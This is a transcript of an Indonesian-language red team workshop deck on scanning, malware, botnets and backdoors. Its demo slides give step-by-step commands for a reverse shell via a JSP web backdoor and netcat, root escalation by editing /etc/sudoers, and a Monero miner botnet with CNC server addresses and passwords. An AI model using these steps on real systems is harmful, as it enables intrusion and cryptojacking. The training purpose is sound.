vulnerability assessment malware/botnet distributionlatsiber.com/va_malware.pdf · membuka service...
TRANSCRIPT
Vulnerability Assessment
Malware/Botnet distribution
company confidential
RED Team
PT XL Axiata, Tbk.
2company confidential
Siapa kami?
Andi IsmayadiLead – Hacking and Defense XL Axiata+62 877 8003 [email protected]
Pecinta Kopi, Fotografi dan Traveling
Hacktivist dari tahun 2003
Saat ini memimpin 6 orang technical team di XL sebagaitim Hacking dan Defense (Red team dan Blue team)
Memimpin Red Team XL Axiata sebagai pemenang Bug Bounty Award dan di nobatkan sebagai Best Hacking Team di antara Perusahaan Axiata di Asia
3company confidential
Siapa kami?
Achmad Riyandika Zazuly (ariz)Penetration Tester+62 8788 77 88 99 [email protected]
Ariz sudah terjun di dunia IT security sejak ia masih duduk di bangku Sekolah Menengah Pertama.
Berpengalaman di bug bounty program, tes aplikasi mobile, aplikasi web, API dan Internet of Things
Berperan sejak tahun 2016 dalam mengamankan produk-produk XL termasuk produk XL prepaid, XL postpaid, mobilebroadband dan produk Axis
4company confidential
Siapa kami?
Anjaswari CuranjayaIT Security Enthusiast+62 [email protected]
Programmer yang menyukai IT Security
Pentester di PT XL Axiata
Top Hall of Fame Tokopedia Bug Bounty Program
Axiata 2018 Best Hacker
5company confidential
APA ITU SCANNING DAN TUJUANNYA?
Scanning merupakan teknik untuk mendapatkan informasi lebih teknis
dari target kita
Dengan melakukan scanning maka kita paham secara teknis akan apa
target kita.
Kita dapat tahu service apa yang di jalankan, target mana yang UP, port
mana yang terbuka, dan jenis OS yang di jalankan
6company confidential
TOOLS
Superscan (Network and port scanner)
Angry IP Scanner (Network and port
scanner)
Nmap (Network and port scanner)
Nessus (Vulnerability Scanner)
7company confidential
MACAM SCANNING
Scanning dibagi 3 Network Scanning
Bertujuan untuk mendapatkan informasi system manayang up dan running dari IP range yang di dapat
Port ScanningSetelah mendapatkan IP mana yg up dan running
selanjutnya adalah mendapatkan informasi ttg port manayang up.
Vulnerability ScanningSelanjutnya adalah dengan melakukan vulnerability
scanning untuk mendapatkan kerentanan dari sistem target kita, informasi ini untuk melakukan serangan di tahapberikutnya.
8company confidential
NETWORK SCANNER
Atau dengan menggunakan Nmap yang bisa running pada multi OS (linux,
windows, Mac OSX). Dengan perintah nmap –sP 1.2.3.0/24 maka akan
melakukan IP Range scanning untuk mengetahui IP mana yang hidup.
9company confidential
VULNERABILITY SCANNER
Salah satu alat yang paling
ampuh dalam melihat
kerentanan yang ada di
dalam suatu system adalah
Nessus.
Tools ini membantu attacker
untuk melihat apa saja
kerentanan yg ada dan
setelahnya dapat melakukan
serangan yang terarah.
Silahkan download Nessus di laman https://www.tenable.com/try
10company confidential
Pengertian Malware
Malware adalah software berbahaya yang terinstal di suatu sistem dan menjalankan tugas berbahaya.
Contoh: Mencuri data, mengontrol OS yang terinfeksi, menginfeksi komputer lain.
11company confidential
Contoh : Crypto-Mining malware trend 2018
12company confidential
Bagaimana malware menyebar?
13company confidential
Botnet & CNC Server
Botnet adalah sekumpulan program yang saling
terhubung melalui Internet yang berkomunikasi
dengan server pusat untuk melakukan tugas
tertentu
CNC Server adalah mesin yang di kontrol oleh
penyerang yang digunakan untuk mengirim
perintah dan menerima laporan dari botnet
14company confidential
Pengertian Backdoor
Backdoor adalah suatu metode yang digunakan penyerang untuk melewati proses normal masuk ke sistem.
Normal akses: Untuk masuk ke server linux, biasanya sysadminmenggunakan service ssh dan menggunakan
autentikasi username dan password
Akses Backdoor: Penyerang yang berhasil mengupload fileberbahaya ke server, maka ia bisa mengakses
kembali file tersebut untuk melakukan kontrol terhadap server tanpa melewati proses normal autentikasi menggunakan service ssh
15company confidential
Tipe Backdoor
Web Backdoor
Service Backdoor
Akun Backdoor
dll
16company confidential
Terima Kasih
17company confidential
Sesi Demo
Demo 1: Backdooring & Lateral Movement ke sistem lain
Demo 2: Infeksi server dengan monero miner botnet
18company confidential
Demo 1: Backdooring & Lateral Movement ke sistem lain
19company confidential
Ulasan: Backdooring & Lateral Movement ke sistem lain
Biasanya penyerang tidak cukup menyerang 1 sistem, melainkan mereka berusaha untuk menginfeksi sistem internal lainnya yang bisa diakses dari mesin utama yang pernah diserang.
The Enterprise
Eksternal
Web Server
Databases
The Internet
Firewall
IDS/IPS
80
Internal
Server
Internal
Server
20company confidential
Persiapan: Backdooring & Lateral Movement ke sistem lain
Persiapan:
1. File backconnect.sh
2. Server eksternal untuk melakukan penyerangan
Server: 103.20.167.23
Username 1: demo1
Password 1: N0ts4f#e!!for##worKN#*E(@y8ee
Username 2: demo2
Password 2: N0ts4f#e!!for##worKN#*E(@y8ff
21company confidential
Demo 1: Backdooring & Lateral Movement ke sistem lain
1. Login SSH ke server 103.20.167.23:
ssh 103.20.167.23 –l demo1
2. ketik perintah untuk buka port:
nc –nlvp 8081
3. Akses backdoor file ke url: http://178.128.29.166:8080/assets/css.jsp
4. Upload file connectback.sh
5. pilih command executor, dan masukan perintah berikut:
bash connectback.sh
22company confidential
Demo 1: Backdooring & Lateral Movement ke sistem lain
5. Jika file connectback berhasil, maka tampilannya sebagai berikut:
6. Agar leluasa dalam mengontrol server target, ketik perintah berikut:
/bin/sh -i
python -c 'import pty; pty.spawn("/bin/sh")'
Export TERM=xterm
23company confidential
Bagaimana cara mendapatkan akses root?
24company confidential
Demo 1: Lateral Movement ke sistem lain
1. Ketik perintah untuk mendapatkan informasi terkait file yang world writable:
find / -perm -o+w | more
Periksa file-file yang mencurigakan
2. Injeksi perintah berikut untuk eskalasi user tomcat ke sudo
echo "tomcat ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
3. ketik perintah “sudo su” untuk mendapatkan akses root
4. langkah selanjutnya adalah mencari informasi terkait server mana saja yang punya keterkaitan dengan server 178.128.29.166
25company confidential
Demo 2: Monero miner – malware distribution
26company confidential
Persiapan: Monero miner – malware distribution
Persiapan:
1. File malware: miner.zip
2. Server eksternal sebagai cnc server: 45.77.240.75
3. Server eksternal sebagai botnet: 178.128.29.166
27company confidential
Demo 1: Monero miner – malware distribution
1. Login RDP ke server 45.77.240.75 kemudian copy file miner.zip
2. Ekstrak file miner.zip dan temukan file berikut pada folder miner-server:
3. Membuka service CNC: Klik kanan dan “Run as administrator” pada file xmrigCCserver.exe
4. Temukan file xmrigDaemon, xmrigMiner dan config.json kemudian copy ke server 178.128.29.166
5. Pada server 178.128.29.166, jalankan perintah berikut:
./xmrigDaemon
28company confidential
Tampilan CNC dashboard
Untuk cek CNC dashboard, akses urlberikut di browser: http://45.77.240.75
Username: botnet
Password: cncserver
29company confidential
Kesimpulan
1. Dari 1 server eksternal yang berhasil diserang 178.128.29.166, ternyata ditemukan server lain yang punya keterkaitan dengan server yang pertama kali diserang.
Disinilah penyerang harus menggali informasi yang dalam terkait sistem yang pernah ia ambil alih.
2. Sebisa mungkin untuk mendapatkan akses setara user“root”. Hal ini untuk memudahkan penyerang dalam mendapatkan informasi tambahan
3. Lateral movement sangat berperan penting dalam distribusi malware crypto-mining
4. Pada umumnya, sistem-sistem korporasi masih menggunakan password yang sama untuk beberapa akun dan
akses server. Hal tersebut memudahkan penyerang untuk mendapatkan banyak akses ke server lain / lateral movement
Eksternal
Web Server
178.128.29.166
Internal
Web Server
45.77.240.75
Internal
Web Server
X